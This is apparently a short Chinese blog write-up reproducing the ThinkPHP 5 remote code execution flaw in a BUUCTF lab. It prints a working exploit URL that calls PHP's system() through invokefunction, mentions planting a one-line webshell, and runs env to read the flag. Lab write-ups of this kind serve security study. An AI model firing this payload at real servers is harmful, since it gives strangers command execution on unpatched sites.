ThinkPhP-5-RCE-漏洞复现

环境

BUUCTF - REAL

image-20260520170501142

漏洞复现

POC

?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami

发现可以执行系统命令

image-20260520172214221

这里可以写入一个一句话木马

通过执行 env 命令查看一下环境变量拿到flag

image-20260520172437597

自动化工具

image-20260520173041428

尝试命令执行 env 拿到 flag

image-20260520175936641

web安全
#漏洞复现
ThinkPhP-5-RCE-漏洞复现
https://blog.lixey.top/ThinkPhP-5-RCE-漏洞复现/
Author
Lixiney
Posted on
May 20, 2026
Licensed under